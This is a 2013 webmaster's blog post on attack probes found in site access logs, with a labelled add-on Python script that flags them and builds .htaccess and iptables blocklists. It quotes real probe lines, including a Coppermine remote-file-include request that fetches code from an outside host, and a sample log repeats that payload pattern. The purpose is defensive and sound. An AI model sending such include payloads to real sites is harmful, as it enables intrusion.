Websites attacked daily from former Soviet Union IP addresses
April 7, 2013
Every day I read my website's raw access logs, looking for things most people ignore. Of course I want to know which search engines are sending me traffic to various pages I wrote and which pages are doing the best. But, more importantly to me, I want to know who is trying to hack my website.
When I talk to others about their websites, most of them are totally absorbed in getting the most visitors (and sales or exposure), meaning they are interested in SEO. That is a good thing, if done properly, not using spammy or blackhat tactics. They also ask about my opinions on this or that easy-to-install script that is offered by their web host. These scripts include blogs, shopping carts, CMS programs, image galleries, forums and the like. All of these add-on web software programs increase the user interactions between your website and its visitors. But, they also make your website more vulnerable to hackers.
As I read my access logs I see numerous attacks targeting various commonly installed website programs and scripts. Every single day there are dozens of probes for a WordPress login screen or admin panel. Image uploaders and themes are targeted constantly. Certain popular shopping carts are frequent targets. Plus, there seems to be a non-stop attempt by spammers to post spam comments and trackbacks on any form that accepts user input.
One thing that most of the various and sundry attacks and probes have in common is where they come from (in IP space). Server hack attempts come mostly from Chinese IP addresses. WordPress login attempts and blog spam POSTS come mostly from Russian and Ukrainian IP addresses. Some spammers use a compromised computer or server in a different country as a relay.
Here are some recent raw access log entries with sources in the former Soviet Union, plus a few from Turkey, Hungary and Romania:
46.119.119.60 (Ukraine) - - [07/Apr/2013:09:25:55 -0600]
"GET /blogs/(50 + signs)Result:+%F4%EE%F0%F3%EC+%ED%E5+%ED%E0%E9%E4%E5%ED+/
+%ED%E5+%F3%E4%E0%EB%EE%F1%FC+%EE%EF%F0%E5%E4%E5%EB%E8%F2%FC+IP HTTP/1.0"
37.57.25.225 (Ukraine) - - [07/Apr/2013:10:14:23 -0600] "GET /wp-login.php HTTP/1.0"
78.162.18.73 (Turkey) - - [07/Apr/2013:11:16:04 -0600]
"GET /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 HTTP/1.1" 403
193.239.74.126 (Ukraine) - - [07/Apr/2013:11:51:50 -0600] "GET /wp-login.php HTTP/1.1" 404 (11 consecutive attempts!)
94.125.177.120 (Hungary) - - [31/Mar/2013:23:53:47 -0600]
"GET /blogs/technical_articles/modules/coppermine/themes/coppercop/theme.php?THEME_DIR=
http://www.printom.ru/netcat/modules/my_captcha/img/fee4181443c7299d710d3036451418e4? HTTP/1.1" 403 333 "-" "libwww-perl/6.02"
78.184.243.200 (Turkey) - - [31/Mar/2013:22:43:50 -0600]
"POST /wp-login.php HTTP/1.1" 403 376 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.2.10) Gecko/20100914 Firefox/3.6.10 ( .NET CLR 3.5.30729; .NET4.0E)"
79.114.49.86 (Romania) - - [31/Mar/2013:22:14:31 -0600]
"GET /member/signup HTTP/1.1" 404
78.190.63.230 (Turkey) - - [31/Mar/2013:08:21:12 -0600]
"POST /wp-login.php HTTP/1.1" 403
(this one was relayed via a botted AT&T account) /blogs/2007/05/(42 + signs)Result:+chosen+nickname+%22bapatickmjuniora9658%22;+ReCaptcha+decoded;+%28JS%29;+
TryAntiSFS=3;+forum+connected+to+antispam-service+%28probably,+your+IP+and/or+nickname+was+BANNED+in+this+service%29;
+PM_LOGIN+mode;+no+post+sending+forms+are+found;
193.239.74.126 (Ukraine) - - [07/Apr/2013:11:51:52 -0600]
"GET /wp-login.php HTTP/1.1"
In addition to what I have listed above, there were untold log entries coming from Russian IP addresses, often with Russian user agent strings, performing what is known as referrer log spamming. This is where a bot requests your pages with a forged Referer header, so that the spammer's site shows up in the HTTP_REFERER field of your access log (and in any referrer statistics your site publishes). The Russian referrer spam usually promotes dating and pornographic websites, and I chose not to paste those entries into this article. Watch the referer section of your access logs for links to websites ending in .ru, .ua, .com.ua, .in, or .su, sometimes followed by a user agent string that includes "MRA" or "ru".
Most of these IP addresses are already covered by my regularly updated Russian Blocklist, which is available online in two formats: .htaccess (for shared hosting accounts on Apache/Linux servers) and iptables (for dedicated and VPS Apache/Linux hosting where you have root access). I do not currently publish a version compatible with Microsoft IIS servers, but I am considering a conversion. Anybody whose website is hosted on an Apache based web server should be able to use the .htaccess directives in the Russian Blocklist, either by copying and pasting them into your existing .htaccess file or by creating a new one from the blocklist example (read the instructions in the file). Keep in mind the difference between the two formats: an .htaccess Deny only stops Apache from serving the request, so the connection still reaches the web server and still lands in your logs, whereas an iptables DROP discards the packets before Apache ever sees them.
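As an added example (this is not the author's blocklist nor any code from the article), the following Python script does in code what the article describes doing by eye: it parses Apache combined-format access-log lines, tags the probe types quoted above (wp-login.php and wp-admin, the JCE imgmanager request, a Coppermine theme.php THEME_DIR remote include, the "Result:+" string left by comment-spam bots), flags referrer spam by the Referer host's TLD with the "MRA"/"ru" user-agent string as a supporting hint, counts tags per source address, and emits repeat offenders in both blocklist formats the article mentions (Apache 2.2 .htaccess Deny directives and iptables rules). The signature set and the three-tag threshold are my assumptions, and the sample log lines are constructed with RFC 5737 documentation addresses, not real log data.

```python
"""Scan Apache combined-format access-log lines for the probe types quoted in
the article and emit block directives for repeat offenders (added example)."""
import re
import sys
from collections import Counter
from urllib.parse import urlsplit

# One combined-format line: ip ident user [ts] "request" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)(?: [^"]*)?" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
    r'(?: "(?P<referer>[^"]*)" "(?P<ua>[^"]*)")?'
)

# Path/query signatures modelled on the log entries in the article (assumed set).
PROBE_SIGNATURES = [
    ("wp-login probe",           re.compile(r'^/wp-login\.php', re.I)),
    ("wp-admin probe",           re.compile(r'^/wp-admin(?:/|$)', re.I)),
    ("JCE imgmanager probe",     re.compile(r'option=com_jce.*plugin=imgmanager', re.I)),
    ("Coppermine THEME_DIR RFI", re.compile(r'theme\.php\?THEME_DIR=https?://', re.I)),
    ("spam-bot result string",   re.compile(r'Result:\+')),
]
SPAM_REFERER_SUFFIXES = (".ru", ".ua", ".in", ".su")      # .com.ua ends in .ua
SPAM_UA_RE = re.compile(r'\bMRA\b|\bru\b')                # supporting hint only


def parse_line(line):
    """Return a dict of fields, or None for a line that is not combined format."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify(entry):
    """Return the list of tags that fire on one parsed entry."""
    tags = [name for name, rx in PROBE_SIGNATURES if rx.search(entry["path"])]
    referer = entry.get("referer") or "-"
    if referer != "-":
        host = (urlsplit(referer).hostname or "").lower()
        if host.endswith(SPAM_REFERER_SUFFIXES):
            tag = "referrer spam"
            if SPAM_UA_RE.search(entry.get("ua") or ""):
                tag += " (ru/MRA user agent)"
            tags.append(tag)
    return tags


def analyze(log_text, threshold=3):
    """Return (flagged events, sorted repeat-offender IPs); an IP becomes a
    repeat offender once it has accumulated `threshold` tags."""
    events, hits = [], Counter()
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue                      # malformed line: skip, never abort the scan
        tags = classify(entry)
        if tags:
            events.append((entry["ip"], entry["path"], entry["status"], tags))
            hits[entry["ip"]] += len(tags)
    offenders = sorted(ip for ip, n in hits.items() if n >= threshold)
    return events, offenders


def htaccess_block(ips):
    """Apache 2.2-style .htaccess deny list (Apache 2.4 uses 'Require not ip')."""
    lines = ["<Limit GET POST HEAD>", "Order Allow,Deny", "Allow from all"]
    lines += [f"Deny from {ip}" for ip in ips]
    lines.append("</Limit>")
    return "\n".join(lines)


def iptables_block(ips, chain="INPUT"):
    """Equivalent iptables rules for a server where you have root."""
    return "\n".join(f"iptables -I {chain} -s {ip} -j DROP" for ip in ips)


# Constructed sample (RFC 5737 documentation addresses), patterned on the
# entries quoted in the article; not real log data.
SAMPLE_LOG = """\
192.0.2.10 - - [07/Apr/2013:11:51:50 -0600] "GET /wp-login.php HTTP/1.1" 404 292 "-" "Mozilla/5.0"
192.0.2.10 - - [07/Apr/2013:11:51:52 -0600] "GET /wp-login.php HTTP/1.1" 404 292 "-" "Mozilla/5.0"
192.0.2.10 - - [07/Apr/2013:11:51:54 -0600] "POST /wp-login.php HTTP/1.1" 403 376 "-" "Mozilla/5.0"
198.51.100.7 - - [07/Apr/2013:11:16:04 -0600] "GET /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 HTTP/1.1" 403 333 "-" "libwww-perl/6.02"
198.51.100.8 - - [31/Mar/2013:23:53:47 -0600] "GET /blogs/modules/coppermine/themes/default/theme.php?THEME_DIR=http://198.51.100.9/x.txt? HTTP/1.1" 403 333 "-" "libwww-perl/6.02"
203.0.113.5 - - [07/Apr/2013:12:00:00 -0600] "GET /blogs/2007/05/ HTTP/1.1" 200 8192 "http://dating.example.ru/" "Mozilla/5.0 (Windows; U; MRA 5.8 (build 4157); ru)"
203.0.113.6 - - [07/Apr/2013:12:01:00 -0600] "GET /blogs/technical_articles/ HTTP/1.1" 200 9001 "https://www.google.com/" "Mozilla/5.0"
"""

if __name__ == "__main__":
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_LOG
    events, offenders = analyze(text)
    for ip, path, status, tags in events:
        print(f"{ip:<15} {status} {', '.join(tags):<34} {path[:60]}")
    print("\n# .htaccess\n" + htaccess_block(offenders))
    print("\n# iptables\n" + iptables_block(offenders))
```

Run it with no arguments to see the constructed sample classified, or pass the path of a real access log as the first argument. On the sample, the three consecutive wp-login.php requests from 192.0.2.10 cross the threshold and that address is the only one emitted as a Deny line and an iptables rule; the single JCE, Coppermine and referrer-spam hits are reported but not blocked. The threshold is deliberately conservative: blocking on a single 404 would eventually block legitimate visitors who mistype a URL, while a burst of wp-login.php requests on a site that does not even run WordPress is unambiguous. Note that a list of single addresses churns quickly; the article's approach of blocking whole ranges catches more, at the cost of blocking every innocent user in those ranges too.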
If you deploy any website software that runs on PHP, expect its vulnerabilities to be sought out and found by hackers. Subscribe to the update announcement lists of each maintainer of the web software that you or your predecessors have installed into your websites. Patching vulnerable web software quickly is vital if you want to keep your website from serving malicious scripts and hidden iframes that lead to your visitors' computers being infected with malware, ransomware, or search hijackers.
Additionally, since many of the probes I log are trying to log in to a WordPress installation, change the default "admin" user name and set a long, unguessable password! Further, change the name of any folders that a default installation names "admin". Hackers send bots to search for such folders, then log in with the default user name and password and add malicious scripts to your web pages. Even if you do not run WordPress, a burst of requests for /wp-login.php (such as the 11 consecutive attempts logged above) identifies the source as a brute-force bot worth blocking.
The content on this blog may be reprinted provided you do not modify the content and that you give credit to Wizcrafts and provide a link back to the blog home page, or individual blog articles you wish to reprint. Commercial use, or derivative work requires written permission from the author.